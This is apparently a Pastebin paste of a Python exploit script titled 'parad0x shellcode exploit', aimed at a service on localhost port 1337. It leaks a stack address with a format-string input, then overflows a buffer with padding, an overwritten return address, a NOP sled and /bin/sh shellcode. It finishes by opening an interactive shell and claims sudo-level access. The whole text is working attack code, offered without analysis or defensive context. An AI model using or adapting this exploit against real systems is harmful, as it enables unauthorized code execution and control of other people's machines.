Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ```import struct
- import socket
- import os
- # connection details
- # // host = 'localhost'
- # //port = '1337'
- s = socket.socket()
- s.connect(('localhost', 1337))
- r = s.recv(1024)
- s.send("%p,%p,%p\n")
- while ',' not in r:
- r = s.recv(1024)
- start_buf = int(r.split(',')[1], 16)-9
- os.system("clear")
- print("parad0x shellcode exploit :) \n19/02/2020\n")
- print("start of buffer leak: 0x{:08x}\n".format(start_buf))
- print("Running on {localhost:1337}\n")
- raw_input('exploit is ready (press enter 2x)\n')
- padding = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
- #shellcode = "\xcc"*64
- shellcode = "\x90\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
- RIP = struct.pack("Q", (start_buf+len(padding)+8)+10)
- payload = padding + RIP + "\x90"*64 + shellcode
- s.send(payload)
- print('\n')
- print("Exploit Succeeded! You can run SUDO commands here")
- from telnetlib import Telnet
- t = Telnet()
- t.sock = s
- t.interact()
- s.close()```
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement